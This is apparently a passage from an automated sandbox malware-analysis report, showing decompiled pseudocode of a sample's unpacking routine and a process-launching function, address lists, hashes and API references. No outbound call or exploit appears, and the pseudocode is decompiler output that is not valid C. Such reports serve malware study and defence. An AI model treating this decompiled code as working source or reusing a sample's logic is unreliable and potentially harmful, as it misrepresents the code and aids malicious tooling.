											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00000000
0x0040663c
0x0040663c
0x00406640
0x00406669
0x00406673
0x00406642
0x0040664b
0x00406658
0x0040665b
0x0040699f
0x0040699f
0x004069a2
0x004069a2
0x004069a2
0x004069a8
0x004069ae
0x004069b4
0x004069ce
0x004069d1
0x004069d7
0x004069e2
0x004069e4
0x004069b6
0x004069b6
0x004069c5
0x004069c9
0x004069c9
0x004069ee
0x00000000
0x00000000
0x004069f0
0x004069f4
0x00406ba3
0x00406bb9
0x00406bc1
0x00406bc8
0x00406bca
0x00406bd1
0x00406bd5
0x00406bd5
0x00406a00
0x00406a07
0x00406a0f
0x00406a12
0x00406a15
0x00406a15
0x00406a1b
0x00406a1b
0x004061b7
0x004061b7
0x004061b7
0x004061c0
0x00000000
0x00000000
0x004061c6
0x00000000
0x004061d1
0x00000000
0x00000000
0x004061da
0x004061dd
0x004061e0
0x004061e4
0x00000000
0x00000000
0x004061ea
0x004061ed
0x004061ef
0x004061f0
0x004061f3
0x004061f5
0x004061f6
0x004061f8
0x004061fb
0x00406200
0x00406205
0x0040620e
0x00406221
0x00406224
0x00406230
0x00406258
0x0040625a
0x00406268
0x00406268
0x0040626c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040625c
0x0040625c
0x0040625f
0x00406260
0x00406260
0x00000000
0x0040625c
0x00406236
0x0040623b
0x0040623b
0x00406244
0x0040624c
0x0040624f
0x00000000
0x00406255
0x00406255
0x00000000
0x00406255
0x00000000
0x00406272
0x00406272
0x00406276
0x00406b22
0x00000000
0x00406b22
0x0040627f
0x0040628f
0x00406292
0x00406295
0x00406295
0x00406295
0x00406298
0x0040629c
0x00000000
0x00000000
0x0040629e
0x004062a4
0x004062ce
0x004062d4
0x004062db
0x00000000
0x004062db
0x004062aa
0x004062ad
0x004062b2
0x004062b2
0x004062bd
0x004062c5
0x004062c8
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040630d
0x00406313
0x00406316
0x00406323
0x0040632b
0x0040699f
0x00000000
0x00000000
0x004062e2
0x004062e2
0x004062e6
0x00406b31
0x00000000
0x00406b31
0x004062f2
0x004062fd
0x004062fd
0x004062fd
0x00406300
0x00406303
0x00406306
0x0040630b
0x00000000
0x00000000
0x00000000
0x00000000
0x004069a2
0x004069a2
0x004069a8
0x004069ae
0x004069b4
0x004069ce
0x004069d1
0x004069d7
0x004069e2
0x004069e4
0x004069b6
0x004069b6
0x004069c5
0x004069c9
0x004069c9
0x004069ee
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406333
0x00406335
0x00406338
0x004063a9
0x004063ac
0x004063af
0x004063b6
0x004063c0
0x0040699f
0x0040699f
0x00000000
0x0040699f
0x0040699f
0x0040633a
0x0040633e
0x00406341
0x00406343
0x00406346
0x00406349
0x0040634b
0x0040634e
0x00406350
0x00406355
0x00406358
0x0040635b
0x0040635f
0x00406366
0x00406369
0x00406370
0x00406374
0x0040637c
0x0040637c
0x0040637c
0x00406376
0x00406376
0x00406376
0x0040636b
0x0040636b
0x0040636b
0x00406380
0x00406383
0x004063a1
0x004063a3
0x00000000
0x00406385
0x00406385
0x00406388
0x0040638b
0x0040638e
0x00406390
0x00406390
0x00406390
0x00406393
0x00406396
0x00406398
0x00406399
0x0040639c
0x00000000
0x0040639c
0x00000000
0x004065d2
0x004065d6
0x004065f4
0x004065f7
0x004065fe
0x00406601
0x00406604
0x00406607
0x0040660a
0x0040660d
0x0040660f
0x00406616
0x00406617
0x00406619
0x0040661c
0x0040661f
0x00406622
0x00406622
0x00406627
0x00000000
0x00406627
0x004065d8
0x004065db
0x004065de
0x004065e8
0x0040699f
0x0040699f
0x00000000
0x0040699f
0x00000000
0x00000000
0x00000000
0x0040667f
0x00406683
0x00000000
0x00000000
0x00406689
0x0040668d
0x00000000
0x00000000
0x00406693
0x00406695
0x00406699
0x00406699
0x0040669c
0x004066a0
0x00000000
0x00000000
0x004066f0
0x004066f4
0x004066fb
0x004066fe
0x00406701
0x0040670b
0x0040699f
0x0040699f
0x00000000
0x0040699f
0x0040699f
0x004066f6
0x00000000
0x00000000
0x00406717
0x0040671b
0x00406722
0x00406725
0x00406728
0x0040671d
0x0040671d
0x0040671d
0x0040672b
0x0040672e
0x00406731
0x00406731
0x00406734
0x00406737
0x0040673a
0x0040673a
0x0040673d
0x00406744
0x00406749
0x00000000
0x00000000
0x004067d7
0x004067d7
0x004067db
0x00406b79
0x00000000
0x00406b79
0x004067e1
0x004067e4
0x004067e7
0x004067eb
0x004067ee
0x004067f4
0x004067f6
0x004067f6
0x004067f6
0x004067f9
0x004067fc
0x00000000
0x00000000
0x004063cc
0x004063cc
0x004063d0
0x00406b3d
0x00000000
0x00406b3d
0x004063d6
0x004063d9
0x004063dc
0x004063e0
0x004063e3
0x004063e9
0x004063eb
0x004063eb
0x004063eb
0x004063ee
0x004063f1
0x004063f1
0x004063f4
0x004063f7
0x00000000
0x00000000
0x004063fd
0x00406403
0x00000000
0x00000000
0x00406409
0x00406409
0x0040640d
0x00406410
0x00406413
0x00406416
0x00406419
0x0040641a
0x0040641d
0x0040641f
0x00406425
0x00406428
0x0040642b
0x0040642e
0x00406431
0x00406434
0x00406437
0x00406453
0x00406456
0x00406459
0x0040645c
0x00406463
0x00406467
0x00406469
0x0040646d
0x00406439
0x00406439
0x0040643d
0x00406445
0x0040644a
0x0040644c
0x0040644e
0x0040644e
0x00406470
0x00406477
0x0040647a
0x00000000
0x00406480
0x00000000
0x00406480
0x00000000
0x00406485
0x00406485
0x00406489
0x00406b49
0x00000000
0x00406b49
0x0040648f
0x00406492
0x00406495
0x00406499
0x0040649c
0x004064a2
0x004064a4
0x004064a4
0x004064a4
0x004064a7
0x004064aa
0x004064aa
0x004064aa
0x004064b0
0x00000000
0x00000000
0x004064b2
0x004064b5
0x004064b8
0x004064bb
0x004064be
0x004064c1
0x004064c4
0x004064c7
0x004064ca
0x004064cd
0x004064d0
0x004064e8
0x004064eb
0x004064ee
0x004064f1
0x004064f1
0x004064f4
0x004064f8
0x004064fa
0x004064d2
0x004064d2
0x004064da
0x004064df
0x004064e1
0x004064e3
0x004064e3
0x004064fd
0x00406504
0x00406507
0x00000000
0x00406509
0x00000000
0x00406509
0x00406507
0x0040650e
0x0040650e
0x0040650e
0x0040650e
0x00000000
0x00000000
0x00406549
0x00406549
0x0040654d
0x00406b55
0x00000000
0x00406b55
0x00406553
0x00406556
0x00406559
0x0040655d
0x00406560
0x00406566
0x00406568
0x00406568
0x00406568
0x0040656b
0x0040656e
0x0040656e
0x00406574
0x00406512
0x00406512
0x00406515
0x00000000
0x00406515
0x00406576
0x00406576
0x00406579
0x0040657c
0x0040657f
0x00406582
0x00406585
0x00406588
0x0040658b
0x0040658e
0x00406591
0x00406594
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b5
0x004065b8
0x004065bc
0x004065be
0x00406596
0x00406596
0x0040659e
0x004065a3
0x004065a5
0x004065a7
0x004065a7
0x004065c1
0x004065c8
0x004065cb
0x00000000
0x004065cd
0x00000000
0x004065cd
0x00000000
0x0040685a
0x0040685a
0x0040685e
0x00406b85
0x00000000
0x00406b85
0x00406864
0x00406867
0x0040686a
0x0040686e
0x00406871
0x00406877
0x00406879
0x00406879
0x00406879
0x0040687c
0x00000000
0x00000000
0x0040662a
0x0040662a
0x0040662d
0x0040699f
0x0040699f
0x00000000
0x0040699f
0x00000000
0x00406969
0x0040696d
0x0040698f
0x00406992
0x0040699c
0x0040699f
0x0040699f
0x00000000
0x0040699f
0x0040699f
0x0040696f
0x00406972
0x00406976
0x00406979
0x00406979
0x0040697c
0x00000000
0x00000000
0x00406a26
0x00406a2a
0x00406a48
0x00406a48
0x00406a48
0x00406a4f
0x00406a56
0x00406a5d
0x00406a5d
0x00000000
0x00406a5d
0x00406a2c
0x00406a2f
0x00406a32
0x00406a35
0x00406a3c
0x00406980
0x00406980
0x00406983
0x00000000
0x00000000
0x00406b17
0x00406b1a
0x00406a1b
0x00000000
0x00000000
0x00406751
0x00406753
0x0040675a
0x0040675b
0x0040675d
0x00406760
0x00000000
0x00000000
0x00406768
0x0040676b
0x0040676e
0x00406770
0x00406772
0x00406772
0x00406773
0x00406776
0x0040677d
0x00406780
0x0040678e
0x00000000
0x00000000
0x00406a64
0x00406a64
0x00406a67
0x00406a6e
0x00000000
0x00000000
0x00406a73
0x00406a73
0x00406a77
0x00406baf
0x00000000
0x00406baf
0x00406a7d
0x00406a80
0x00406a83
0x00406a87
0x00406a8a
0x00406a90
0x00406a92
0x00406a92
0x00406a92
0x00406a95
0x00406a98
0x00406a98
0x00406a98
0x00406a98
0x00406a9b
0x00406a9b
0x00406a9f
0x00406aff
0x00406b02
0x00406b07
0x00406b08
0x00406b0a
0x00406b0c
0x00406b0f
0x00406a1b
0x00406a1b
0x00000000
0x00406a21
0x00406a1b
0x00406aa1
0x00406aa7
0x00406aaa
0x00406aad
0x00406ab0
0x00406ab3
0x00406ab6
0x00406ab9
0x00406abc
0x00406abf
0x00406ac2
0x00406adb
0x00406ade
0x00406ae1
0x00406ae4
0x00406ae8
0x00406aea
0x00406aea
0x00406aeb
0x00406aee
0x00406ac4
0x00406ac4
0x00406acc
0x00406ad1
0x00406ad3
0x00406ad6
0x00406ad6
0x00406af1
0x00406af8
0x00000000
0x00406afa
0x00000000
0x00406afa
0x00000000
0x00406796
0x00406799
0x004067cf
0x004068ff
0x004068ff
0x004068ff
0x004068ff
0x00406902
0x00406902
0x00406905
0x00406907
0x00406b91
0x00000000
0x00406b91
0x0040690d
0x00406910
0x00000000
0x00000000
0x00406916
0x0040691a
0x0040691d
0x0040691d
0x0040691d
0x00000000
0x0040691d
0x0040679b
0x0040679d
0x0040679f
0x004067a1
0x004067a4
0x004067a5
0x004067a7
0x004067a9
0x004067ac
0x004067af
0x004067c5
0x004067ca
0x00406802
0x00406802
0x00406806
0x00406832
0x00406834
0x0040683b
0x0040683e
0x00406841
0x00406841
0x00406846
0x00406846
0x00406848
0x0040684b
0x00406852
0x00406855
0x00406882
0x00406882
0x00406885
0x00406888
0x004068fc
0x004068fc
0x004068fc
0x00000000
0x004068fc
0x0040688a
0x00406890
0x00406893
0x00406896
0x00406899
0x0040689c
0x0040689f
0x004068a2
0x004068a5
0x004068a8
0x004068ab
0x004068c4
0x004068c6
0x004068c9
0x004068ca
0x004068cd
0x004068cf
0x004068d2
0x004068d4
0x004068d6
0x004068d9
0x004068db
0x004068de
0x004068e2
0x004068e4
0x004068e4
0x004068e5
0x004068e8
0x004068eb
0x004068ad
0x004068ad
0x004068b5
0x004068ba
0x004068bc
0x004068bf
0x004068bf
0x004068ee
0x004068f5
0x0040687f
0x0040687f
0x0040687f
0x0040687f
0x00000000
0x004068f7
0x00000000
0x004068f7
0x004068f5
0x00406808
0x0040680b
0x0040680d
0x00406810
0x00406813
0x00406816
0x00406818
0x0040681b
0x0040681e
0x0040681e
0x00406821
0x00406821
0x00406824
0x0040682b
0x004067ff
0x004067ff
0x004067ff
0x004067ff
0x00000000
0x0040682d
0x00000000
0x0040682d
0x0040682b
0x004067b1
0x004067b4
0x004067b6
0x004067b9
0x00000000
0x00000000
0x00406518
0x00406518
0x0040651c
0x00406b61
0x00000000
0x00406b61
0x00406522
0x00406525
0x00406528
0x0040652b
0x0040652e
0x00406531
0x00406534
0x00406536
0x00406539
0x0040653c
0x0040653f
0x00406541
0x00406541
0x00406541
0x00000000
0x00000000
0x004066a3
0x004066a3
0x004066a7
0x00406b6d
0x00000000
0x00406b6d
0x004066ad
0x004066b0
0x004066b3
0x004066b6
0x004066b8
0x004066b8
0x004066b8
0x004066bb
0x004066be
0x004066c1
0x004066c4
0x004066c7
0x004066ca
0x004066cb
0x004066cd
0x004066cd
0x004066cd
0x004066d0
0x004066d3
0x004066d6
0x004066d9
0x004066d9
0x004066d9
0x004066dc
0x004066de
0x004066de
0x00000000
0x00000000
0x00406920
0x00406920
0x00406920
0x00406924
0x00000000
0x00000000
0x0040692a
0x0040692d
0x00406930
0x00406933
0x00406935
0x00406935
0x00406935
0x00406938
0x0040693b
0x0040693e
0x00406941
0x00406944
0x00406947
0x00406948
0x0040694a
0x0040694a
0x0040694a
0x0040694d
0x00406950
0x00406953
0x00406956
0x00406959
0x0040695d
0x0040695f
0x00406962
0x00000000
0x00406964
0x004066e1
0x004066e1
0x00000000
0x004066e1
0x00406962
0x00406b97
0x00000000
0x00000000
0x004061c6
0x00406bce
0x00406bce
0x00000000
0x00406bce
0x00406a1b
0x004069a2
0x0040699f

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8be065f2055dc1cd174fd52254904ed3951c4d9a2d1eb8bfd7021972752a86bd
Instruction ID: da41e8a59283c5151f8221a14089d7a30d21e655082da74c54adec62798c0c17
Opcode Fuzzy Hash: 8be065f2055dc1cd174fd52254904ed3951c4d9a2d1eb8bfd7021972752a86bd
Instruction Fuzzy Hash: 3B714771E00229CBDF28CF98C8447ADBBB1FB44305F15816ED856BB291C778AA56DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00401E1B Relevance: 4.5, APIs: 3, Instructions: 48
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00401E1B() {
				void* _t15;
				void* _t24;
				void* _t26;
				void* _t31;

				_t28 = E00402A0C(_t24);
				E00404FE7(0xffffffeb, _t13);
				_t15 = E0040555B(_t28); // executed
				 *(_t31 + 8) = _t15;
				if(_t15 == _t24) {
					 *((intOrPtr*)(_t31 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t31 - 0x20)) != _t24) {
						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
							E004060C3(0xf);
						}
						GetExitCodeProcess( *(_t31 + 8), _t31 - 0xc); // executed
						if( *((intOrPtr*)(_t31 - 0x24)) < _t24) {
							if( *(_t31 - 0xc) != _t24) {
								 *((intOrPtr*)(_t31 - 4)) = 1;
							}
						} else {
							E00405C59(_t26,  *(_t31 - 0xc));
						}
					}
					_push( *(_t31 + 8));
					CloseHandle();
				}
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t31 - 4));
				return 0;
			}

0x00401e21
0x00401e26
0x00401e2c
0x00401e33
0x00401e36
0x00402672
0x00401e3c
0x00401e3f
0x00401e50
0x00401e4b
0x00401e4b
0x00401e65
0x00401e6e
0x00401e7e
0x00401e80
0x00401e80
0x00401e70
0x00401e74
0x00401e74
0x00401e6e
0x00401e87
0x00401e8a
0x00401e8a
0x004028a4
0x004028b0

APIs

Part of subcall function 00404FE7: lstrlenA.KERNEL32(0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000,?), ref: 00405020
Part of subcall function 00404FE7: lstrlenA.KERNEL32(00402C60,0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000), ref: 00405030
Part of subcall function 00404FE7: lstrcatA.KERNEL32(0041FD58,00402C60,00402C60,0041FD58,00000000,00000000,00000000), ref: 00405043
Part of subcall function 00404FE7: SetWindowTextA.USER32(0041FD58,0041FD58), ref: 00405055
Part of subcall function 00404FE7: SendMessageA.USER32 ref: 0040507B
